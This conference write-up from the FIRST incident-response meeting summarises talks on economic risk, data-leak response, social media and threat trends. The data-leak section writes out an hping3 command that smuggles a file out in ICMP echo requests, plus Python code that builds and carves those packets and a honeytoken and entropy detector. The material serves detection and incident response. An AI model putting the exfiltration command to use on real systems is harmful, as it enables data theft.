Well I’m finally over my jet-lag, ok, almost over my jet-lag, and day 1 of the 21st FIRST conference is just about complete. I managed to hit a few interesting talks today. Not all of them were public information, but I’ve written up some notes from the ones that were for your enjoyment. Short note: this isn’t a high-tech conference like Blackhat, so if you think the information is a little high-level, then you’ll understand why. The focus of the conference is more on Incident Response and Handling than my usual attack vectors stuff, but so far it’s been a great experience. Hope you enjoy the write-up.
09:00 Information Security Management and Economic Crisis – Suguru Yamaguchi
I know that keynotes are usually meant to be dry and a little bit boring (sorry, but you can’t sugar coat the truth), however I decided to risk it and pop in to see what was on offer. It seems that nobody told Mr Yamaguchi that he was meant to be boring, which made for a bit of a surprise. After a quick guide to what to see in Kyoto (along with shopping tips) and some historical information about Japan (and why the food was much better here in Kyoto than in Tokyo), the talk moved into the more serious side of risk management in the current economic climate. The topics covered were varied, so stay with me if it seems a little chaotic.
Economic Crisis / time of “less”
The initial focus was on the use of technology in Japan to automate and streamline services: the speed/control systems used in the Japanese bullet trains, management of the Tokyo underground network, RFID for stock tracking and distribution management (automating the shipment of stock to locations depending on demand) and water control/flow management. The use of technology is also now working its way into smaller businesses such as taxi services (using TCP/IP connected terminals in the cabs to transmit requests and improve management of services). IT is now a vital component of all businesses; not just large multi-nationals but also smaller businesses are becoming reliant on these systems for everyday business purposes.
“perimeter protection model” doesn’t work anymore
With the increase in outsourcing, ASP, SaaS and cloud computing the perimeter is much more fluid and undefined. Services are now provided by entities in other countries, operating under different rules, laws and standards.
Risks have changed dramatically
- Quality and Quantity of “attacks”
- Economic damages
- Who is attacking / being attacked
“Public Private Partnership” –> Government policy to encourage knowledge sharing across business domains (especially critical infrastructure)
Main goals set in 2006 (in Japan), new goals to be reviewed in 2009 .:
- More preparedness
- More scientific approach
- Share risk between business and government
The economic crisis has caused costs to be cut in various ways: less investment in information systems (including information security management) and a slow-down of innovation, upgrades and improvements. As headcount falls, companies are unable to innovate and adapt as easily as before.
Mission impossible for system operators: lower budgets, fewer staff and an increase in security incidents (a rise in data loss/theft issues). Cost savings and security assistance can be achieved through the use of virtualization and BYO (Bring Your Own) laptop schemes, where personal laptops are used for business purposes on top of virtualization or thin-client solutions. This reduces costs and can help improve security, since the business data can be kept inside the managed virtual machine or thin-client session rather than on the personal device.
Real-time 3D visualization by Nicter (Network Incident analysis Center for Tactical Emergency Response)
Use of visualization to compare attack traffic with normal traffic. With this technique it is easy to see port scans, DoS attempts and a variety of other attack types visually and in real time. This helps to streamline information management at a time when less has to do more.
Invisible computers are a growing risk: electronics that are not traditional computers but operate on TCP/IP networks (HD recorders, set-top boxes, etc.). These systems are more vulnerable and open to abuse, and attacks routed through such devices have started to be seen in the wild in Japan.
13:30 Proprietary data leaks: Response and Recovery – Sherri Davidoff / Johnathon Ham
Scenario: Attacker has physical access
Attacker Profile: Staff member, cleaning staff, security guards, etc…
Spybase Wireless Keylogger ($285 Amazon)
- Install once and access through wireless to download the data
- Staff are unaware of, or untrained in, what to check for on a system to spot a keylogger
Questions to ask in a response scenario
- How long has the keylogger been installed ?
- Who planted it ?
- What information has been exposed ?
- What other systems could be exposed ?
Keyloggers have serial numbers, many manufacturers will provide information on sales to law enforcement in the event of an incident. Track other systems that have had the same device installed. Often the attacker has tested it on his/her own machine first. If this is an internal staff member, then this may be a source of information.
USB devices come in many different formats: pens, wristbands, iPods, sushi (yes, as seen in Johnny Long’s presentation), and there are many different places to hide things like micro-SD cards. IronKey has a professional USB stick that supports remote wipe. If you recover this kind of USB device in an incident response, store it in a suitable bag to block incoming wipe commands.
Sherri performed a live demo that demonstrated how easy it is to download data from a system to a phone connected through USB. By using encryption and deleting the key after encryption it is possible to prevent a responder identifying what data was copied.
In physical access cases .:
- Monitor account/system usage
- Preserve evidence / chain of custody
- Determine type of affected data
- Contact legal advisers
- Lockout / monitor (depending on situation)
- Identify systems that could also be exposed
Scenario: Attacker Logical Access
Use of covert channels to exfiltrate the data without triggering defenses
Examples of covert channels :
- ICMP Echo Request Tunneling (Loki)
- Implemented using hping3 -E secret.xls -1 -u -d 1024 nonexistent.domain.com (ICMP mode, the payload of each echo request taken from the file in 1024-byte chunks)
- Capture using tcpdump
Hard to track where the data is going (ICMP to a nonexistent domain). The attacker must be somewhere on the path to capture the data using tcpdump; open the capture in Wireshark and then carve out the file.
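To make the mechanics of that hping3 line concrete, here is an added example (my own illustration, not code from the speakers) that reproduces in Python what happens on the wire: the file is cut into 1024-byte chunks, each chunk becomes the payload of an ICMP echo request (type 8) with a valid RFC 1071 checksum, and the sniffer on the path recovers the file by filtering on the tunnel’s identifier and re-ordering by sequence number, which is exactly the carving step a responder does in Wireshark. The secret file contents, the identifier 0xBEEF and the unrelated ping mixed into the traffic are all constructed sample data.

```python
import random
import struct


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; over a valid packet it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_requests(payload: bytes, ident: int, chunk: int) -> list:
    """Split payload into chunk-byte pieces and wrap each in an ICMP echo
    request (type 8, code 0). The sequence number orders the pieces, which is
    what hping3 -1 -E file -d size puts on the wire."""
    packets = []
    for seq, off in enumerate(range(0, len(payload), chunk)):
        body = payload[off:off + chunk]
        header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
        csum = icmp_checksum(header + body)
        packets.append(struct.pack("!BBHHH", 8, 0, csum, ident, seq) + body)
    return packets


def parse_icmp(pkt: bytes):
    """Return (type, code, ident, seq, payload); reject truncated/corrupt packets."""
    if len(pkt) < 8 or icmp_checksum(pkt) != 0:
        raise ValueError("truncated or corrupt ICMP packet")
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return typ, code, ident, seq, pkt[8:]


def carve_file(captured: list, ident: int) -> bytes:
    """What the sniffer on the path does with the captured echo requests:
    keep the ones with the tunnel's identifier, order by seq, join payloads."""
    pieces = {}
    for pkt in captured:
        try:
            typ, code, pid, seq, data = parse_icmp(pkt)
        except ValueError:
            continue  # damaged packet, nothing to carve from it
        if typ == 8 and code == 0 and pid == ident:
            pieces[seq] = data
    return b"".join(pieces[s] for s in sorted(pieces))


# Constructed sample data (not from the talk): the contents of "secret.xls"
# as a CSV-like blob, and an ordinary 56-byte ping that shares the wire.
SECRET = b"Customer,Card\nA. Example,4111111111111111\n" * 40
TUNNEL_ID = 0xBEEF
NORMAL_PING = build_echo_requests(b"\x00" * 56, 0x1234, 56)


def demo() -> bytes:
    """Send the file in 1024-byte chunks, mix in unrelated traffic, reorder,
    then carve it back out the way a responder would from a pcap."""
    wire = build_echo_requests(SECRET, TUNNEL_ID, 1024) + NORMAL_PING
    random.Random(1).shuffle(wire)  # packets need not arrive in order
    return carve_file(wire, TUNNEL_ID)


if __name__ == "__main__":
    recovered = demo()
    print("recovered %d bytes, intact: %s" % (len(recovered), recovered == SECRET))
```

Note that the payload travels in the clear: anyone who can sniff the path (the attacker, but also the responder) gets the file back with nothing more than a filter on type 8 and the identifier, which is why the later detection advice works on payload content rather than on the destination.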
How to protect against this ?
- Track the data export at the database
- Log commands run on servers / applications installed on servers
- Should this server be sending Echo Requests ? Block and Log
- Watch for proprietary data on the wire (in cleartext)
- Using regular expressions to detect specific data patterns
- Implement using something like SNORT
Use Honeytokens to trigger alerts. Insert dummy records into the database (that should never be returned unless the whole table is dumped), files with seemingly interesting data (passwords.xls) which are present in a non-browsable area of your website. Insert code-comments into the source-code of your internally developed applications and create rules to alert/block traffic leaving your network with these comments.
This doesn’t prevent exposure and doesn’t tell you the depth of the issue; however, the first piece of the puzzle is being aware that something bad is happening.
Issues: encryption of the data will prevent the honeytoken being tracked.
Solution: frequency analysis. Measure the frequency distribution of byte values to discover whether the data is encrypted, then search for and alert on encrypted data where it is not part of the normal traffic pattern: entropy-based anomaly detection through the Snort platform. No plugin exists yet for this purpose. Stay tuned…
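Putting the two detection ideas from this talk together (honeytoken matching on the wire, and flagging random-looking data where it has no business being), here is an added example in Python; it is my illustration, not the speakers’ code or any Snort plugin. The honeytoken values (a dummy account record, the planted passwords.xls name, a build-marker comment seeded into source), the port allow-list, the entropy threshold and the sample flows are all constructed assumptions. Encrypted data is approximated by chained SHA-256 output so the example runs deterministically offline.

```python
import hashlib
import math
import re
from collections import Counter

# Constructed honeytokens (hypothetical values, not from the talk): a dummy
# database record that no real query should return, a planted file name, and
# a marker comment seeded into internally developed source code.
HONEYTOKENS = {
    "dummy-db-record": re.compile(rb"ACCT-00000000-CANARY"),
    "planted-file": re.compile(rb"passwords\.xls"),
    "source-comment": re.compile(rb"//\s*build-marker:\s*hx-[0-9a-f]{6}"),
}

# Magic numbers of common compressed/packed formats: they are high-entropy by
# nature and would otherwise be mistaken for ciphertext.
KNOWN_COMPRESSED = (b"\x1f\x8b", b"PK\x03\x04", b"\x89PNG", b"\xff\xd8\xff", b"BZh")

ENTROPY_THRESHOLD = 7.2  # bits per byte; English text sits around 4-5, ciphertext near 8
MIN_LEN = 256            # entropy estimates over short payloads are unreliable


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of data; exactly 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def find_honeytokens(payload: bytes) -> list:
    return [name for name, rx in HONEYTOKENS.items() if rx.search(payload)]


def classify_payload(payload: bytes) -> str:
    hits = find_honeytokens(payload)
    if hits:
        return "honeytoken:" + ",".join(hits)
    if payload.startswith(KNOWN_COMPRESSED):
        return "compressed"
    if len(payload) >= MIN_LEN and shannon_entropy(payload) >= ENTROPY_THRESHOLD:
        return "high-entropy"
    return "clear"


def scan_flows(flows, expected_encrypted_ports=(22, 443)) -> list:
    """Return (src, dst, dport, verdict) for flows worth an alert: any honeytoken
    leaving the network, or random-looking data on a port where it is not expected."""
    alerts = []
    for src, dst, dport, payload in flows:
        verdict = classify_payload(payload)
        if verdict.startswith("honeytoken:"):
            alerts.append((src, dst, dport, verdict))
        elif verdict == "high-entropy" and dport not in expected_encrypted_ports:
            alerts.append((src, dst, dport, verdict))
    return alerts


def _pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic stand-in for ciphertext: chained SHA-256 output."""
    out, h = b"", seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return out[:n]


# Constructed outbound flows: (src, dst, dport, payload)
SAMPLE_FLOWS = [
    ("10.0.0.5", "203.0.113.9", 80,
     b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ("10.0.0.5", "203.0.113.9", 80,
     b"POST /upload HTTP/1.1\r\n\r\n// build-marker: hx-3f9a1c\nint main(void) { return 0; }\n"),
    ("10.0.0.7", "203.0.113.9", 443, _pseudo_random(1024)),               # TLS, expected
    ("10.0.0.7", "198.51.100.4", 8080, _pseudo_random(1024)),             # random data, odd port
    ("10.0.0.8", "198.51.100.4", 8080, b"\x1f\x8b" + _pseudo_random(1024)),  # gzip upload
]

if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print("ALERT", alert)
```

The honeytoken half maps directly onto a Snort content rule on outbound traffic (a content: match for the marker string in a rule from $HOME_NET to $EXTERNAL_NET). The entropy half is the part Snort had no plugin for at the time, and the two checks it needs in practice are visible above: a minimum payload length, because byte frequencies over a few dozen bytes say nothing, and an allow-list for formats and ports that are legitimately random-looking (compressed files, TLS, SSH), otherwise every gzip upload and HTTPS session becomes an alert.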
Last point of recovery process needs to be an improved preventative posture. Lessons learned.
What we’ve learned :
- Think like an evil insider
- Log everything possible to improve the scoping of the breach
14:30 Using Social Media in Incident Response – Martin McKeay
Staff / Responders that use social media are releasing information live as it comes in. Due to the fact this is a live response, it can often be more about emotion than about fact. Company policy for electronic media (including social media) isn’t set in a majority of companies. Those that do have a policy do not always enforce the policy, or make staff aware of their responsibilities.
Companies are slow to come to social networking and are seeing issues when they look to claim their company name or trademark. Who is currently using your company name on Twitter, Facebook, MySpace, etc.? There are incidents of non-staff taking the name of companies and using it to communicate as if they were the company. There are also cases of unauthorized staff using the company name within social networking sites or blogs. Readers of official company blogs and social media services are unforgiving when it comes to pure marketing and sales messages. In order to be a useful communication tool for handling and communicating incidents, you have to build followers and readers prior to having an incident. This takes more than just posting up marketing information and expecting people to listen.
Company policy should dictate what happens when an incident occurs. If you suddenly stop twittering/blogging then people will notice and think the worst. News travels fast on social networks, and unless you supply the news, this information can come from any source and be based on pure speculation. The AT&T outage can be used as a good example: many users on Twitter were mapping out the areas suffering a connection outage while AT&T didn’t talk about the issue openly. This caused damage to AT&T’s reputation.
Key points .:
- Assign person who will communicate
- Policy on what to communicate
- Who is dealing with the blogosphere / social media
16:30 Emerging Threats and Attack Trends – Paul Oxman
Threats are moving up the stack towards targeting individuals.
Designer malcode is now being developed using bleeding edge software development techniques and protections. As with other software maturity models, malware has also begun to adopt the same processes. Backup malcode is being made available to customers in order to replace the original once AV vendors catch up and start detecting the attack code.
Large-scale worms are getting rarer as attacks become more targeted and selective. As the large-scale attacks drop, the cybercrime profits have increased. Email as an attack vector is also slowing as web based vectors increase in popularity. Blended attacks are becoming more prevalent.
Cyber-terrorism – Future conflicts are much more likely to have a cyber element to them.
- 70% of the top 100 websites pointed to (or contained) malware
- Number of vulnerabilities up 11% from 2007
- Reputation HiJacking on the increase
- Attacks are more targeted to help maximize effectiveness
- More reliance on blended threats
Issues of hardware being infected at “source” to catch consumers off guard. A user is more likely to accept an install request when they plug in a new device (e.g. a digital photo frame).
Attackers are taking information gathered from phishing attacks and using it on various popular services to catch users who are relying on a limited set (or even just one) password for multiple services/sites.
July 2008 – 45% of browsers still vulnerable despite auto-update features.
Malware targeting current events (Olympics was a prime target for attack). The fake Olympics website netted 40-50 Million USD, and gathered username/passwords for further attacks on websites.
Known vulnerabilities are left unpatched. Attackers don’t have to come up with 0-day attacks if they can exploit known issues.
Case study of how the creators of Conficker evolved their attack by updating from MD5 to MD6 and then patching a flaw in MD6 when it was found to be vulnerable. 85% of the code was replaced from one version to the next. Not your average malware.
Threats on the horizon:
- SMS vishing
- Extensive social engineering
- More highly targeted attacks
- Attacks on mobile devices (the variety of different OSes is an obstacle for attackers)
- Using video sharing sites as a method for distribution of malware
Incident response. The most important factors are preparation for the (inevitable) attack/incident, and the post-mortem to learn from your response (often forgotten or skipped).
Well that’s all from day 1. No sushi yet, but the night is young. More to follow after day 2 😉